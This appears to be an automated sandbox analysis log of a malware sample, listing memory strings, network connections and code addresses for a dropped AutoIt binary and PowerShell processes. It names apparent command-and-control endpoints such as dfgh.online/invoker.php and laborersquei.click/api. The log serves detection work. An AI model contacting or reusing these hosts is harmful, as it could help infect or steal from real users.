                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://d.symcb.com/cps0%
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://d.symcb.com/rpa0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
                  Source: powershell.exe, 0000001C.00000002.2132862025.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
                  Source: powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCLg
                  Source: powershell.exe, 0000001C.00000002.2165120458.0000000008212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://epicsupport.force.com/unrealengine/s/
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000001C.00000002.2134794357.00000000053D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000001E.00000002.2348706080.0000000007572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
                  Source: Lightweight.com, 00000017.00000003.2161329434.0000000005D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/
                  Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2307418203.0000000003BBE000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2309158308.0000000003C9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/int_clp_sha.txt
                  Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/
                  Source: Lightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278853392.0000000003BB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api
                  Source: Lightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apie
                  Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click:443/api
                  Source: powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Mf.20.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.drString found in binary or memory: https://www.globalsign.com/repository/03
                  Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: installer_1.05_36.4.exe.10.drString found in binary or memory: https://www.ssl.com/repository0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.16:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.16:49719 version: TLS 1.2
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_0c1b5432-a
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_04C0F4E028_2_04C0F4E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_04C0F4E028_2_04C0F4E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_078977A828_2_078977A8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087E762028_2_087E7620
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087EBAB828_2_087EBAB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087EBAA828_2_087EBAA8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087ECCB028_2_087ECCB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087E004028_2_087E0040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087E001328_2_087E0013
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087E761028_2_087E7610
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B580F028_2_08B580F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B56B4828_2_08B56B48
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B53DA928_2_08B53DA9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B5754828_2_08B57548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B53E1028_2_08B53E10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B53E0128_2_08B53E01
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B91AC028_2_08B91AC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B91AC028_2_08B91AC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B9752028_2_08B97520
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9B8E228_2_08C9B8E2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9639828_2_08C96398
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C989C428_2_08C989C4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9F16028_2_08C9F160
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9DC0028_2_08C9DC00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C94DD028_2_08C94DD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C99D5128_2_08C99D51
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C90D5028_2_08C90D50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9E60028_2_08C9E600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D10CD028_2_08D10CD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1515828_2_08D15158
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D162E828_2_08D162E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D19AA428_2_08D19AA4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1545028_2_08D15450
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D145F028_2_08D145F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1353028_2_08D13530
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D18ED028_2_08D18ED0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D16EB828_2_08D16EB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D16FD828_2_08D16FD8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1CFE828_2_08D1CFE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D6D99828_2_08D6D998
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DC62C028_2_08DC62C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DC02E028_2_08DC02E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DC025028_2_08DC0250
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD967028_2_08DD9670
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD280828_2_08DD2808
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD6BBA28_2_08DD6BBA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DE184028_2_08DE1840
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DEAA7828_2_08DEAA78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DEBC8028_2_08DEBC80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DE85D828_2_08DE85D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DE35D828_2_08DE35D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DE8BC828_2_08DE8BC8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DE35D828_2_08DE35D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD44D028_2_08DD44D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DCC38128_2_08DCC381
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_082F332830_2_082F3328
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0875004030_2_08750040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0875F4E030_2_0875F4E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0875BD6030_2_0875BD60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0875BD3830_2_0875BD38
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0875001330_2_08750013
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_087527C030_2_087527C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_087527B030_2_087527B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_087C70E830_2_087C70E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_087C70E830_2_087C70E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_088673B830_2_088673B8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0886BEC030_2_0886BEC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08862ED030_2_08862ED0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08862EE030_2_08862EE0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0886A63830_2_0886A638
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0886D7B830_2_0886D7B8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0889620930_2_08896209
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0889333830_2_08893338
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0889F1A030_2_0889F1A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08891AE830_2_08891AE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_088974E830_2_088974E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0897C1FB30_2_0897C1FB
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A1004030_2_08A10040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A12F8030_2_08A12F80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A1000630_2_08A10006
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A1C06030_2_08A1C060
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A17B5030_2_08A17B50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A15C0030_2_08A15C00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A5004030_2_08A50040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A555F830_2_08A555F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A7C8C830_2_08A7C8C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A7198830_2_08A71988
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08A7BF6030_2_08A7BF60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AC59A030_2_08AC59A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ACF53030_2_08ACF530
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ACB72830_2_08ACB728
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AC59A030_2_08AC59A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD28D830_2_08AD28D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD28D830_2_08AD28D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ADE0E030_2_08ADE0E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD28D830_2_08AD28D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ADE0E030_2_08ADE0E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ADE0E030_2_08ADE0E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD28D830_2_08AD28D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD28D830_2_08AD28D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AEA57A30_2_08AEA57A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08ACD4E030_2_08ACD4E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_0889C7E130_2_0889C7E1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_08AD877530_2_08AD8775
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: lang-1058.dll.10.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM)
                  Source: lang-1058.dll.10.drStatic PE information: No import functions for PE file found
                  Source: lang-1049.dll.10.drStatic PE information: No import functions for PE file found
                  Source: opengl64.dll.10.drBinary string: 4: Use Windows functions, use names such as DirectX Device (newest, most promising)r.DriverDetectionMethodD:\build\++Portal\Sync\Engine\Source\Runtime\Core\Public\GenericPlatform/GenericPlatformProcess.hURLParmsWindows (unknown version)Windows 2000ProfessionalDatacenter ServerAdvanced ServerWindows XPHome EditionWindows Server 2003 R2Windows Storage Server 2003Windows Home ServerProfessional x64 EditionWindows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 11Windows 10Windows Server 2022Windows Server 2019ReleaseIdSOFTWARE\Microsoft\Windows NT\CurrentVersion (Release %s)GetProductInfokernel32.dllUltimate EditionHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server Edition(type unknown)64bit%d.%d.%d.%d.%d.%sPureVirtualFunctionCalledWhileRunningAppPure virtual function being called while application was running (GIsRunning == 1).Pure virtual function being calledError_ResolutionTooLowLaunchThe current resolution is too low to run this game.Computer: %sCPU Page size=%i, Cores=%iHigh frequency timer resolution =%f MHzConsoleCtrl RequestExit*** INTERRUPTED *** : SHUTTING DOWN*** INTERRUPTED *** : CTRL-C TO FORCE QUITntdll.dllRtlAreLongPathsEnabledAttempting to run KillAllPopUpBlockingWindowsKillAllPopUpBlockingWindows.batWin RequestExitOutBuffer && BufferCountCoCreateGuid( (GUID*)&Result )==((HRESULT)0L)No to AllYes to AllNoToAllYesToAllusehyperthreading-corelimit=SoftwareFWindowsPlatformMisc::SetStoredValue: ERROR: Could not store value for '%s'. Error Code %u: %sDevice DescriptionDriverDesc\SettingsProviderNameNVIDIAAdvanced Micro DevicesIntelDriverVersionCatalyst_VersionCatalyst RadeonSoftwareEditionRadeonSoftwareVersionDriverDateEnumDisplayDevices: %d. '%s' (P:%d D:%d)JumpOverNonPrimary \Registry\Machine\\HKEY_LOCAL_MACHINE\GetVideoDriverDetailsInvalid PrimaryIsNotTheChoosenAdapter PrimaryDriverLocationFailed FoundDriverCount:%d DebugString: %sSYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\%04dFoundDriverCount:%d FallbackToPrimary \Device\Video0HARDWARE\DEVICEMAP\VIDEOQueryForPrimaryFailed MachineGuidSoftware\Microsoft\CryptographyDefaultProviderNameStreamingInstallData
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drBinary or memory string: .Target.cs.Build.csSourceIntermediate/TargetInfo.json-Mode=QueryTargets -Project="%s" -Output="%s"Unable to read target info for %s.slnUnreal ProjectsUnrealEngineLauncher/LauncherInstalled.datUE_4.040003UE_4.11040003InstallationListInstallLocationUnrealEngineLauncher/Data/Manifests/%s.manifestCustomFieldsInstallLocation*.upluginIntermediate5.0EASaved/ConfigEditorGameAgnosticCreatedProjectPathsRecentlyOpenedProjectFiles(ProjectName="/Templates/
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.drBinary or memory string: SOFTWARE\SOFTWARE\Wow6432Node\MSBuild/14.0/bin/MSBuild.exeMSBuild.exeMSBuildToolsPathMicrosoft\MSBuild\ToolsVersions\14.0MSBuild\15.0\bin\MSBuild.exe15.0Microsoft\VisualStudio\SxS\VS7Microsoft\MSBuild\ToolsVersions\12.0Microsoft\MSBuild\ToolsVersions\4.0Building UnrealBuildTool in %s...Project file not found at %sCouldn't find MSBuild installation; skipping./nologo /verbosity:quiet "%s" /property:Configuration=Development /property:Platform=AnyCPURunning: %s %sFailed to start process.Missing %s after buildTargetsEngine/Source/Programs/UnrealBuildTool/UnrealBuildTool.csprojEngine/Config/UnrealBuildToolPlatformPathsEngine/Binaries/DotNET/UnrealBuildTool.exeLauncher.Platform_%sLauncher.Platform_%s.LargeLauncher.Platform_%s.XLargeD:/build/++Portal/Sync/Engine/Source/Developer/DesktopPlatform/Private/PlatformInfo.cppCookFlavorBuildFlavorUnknown platform flag %s in 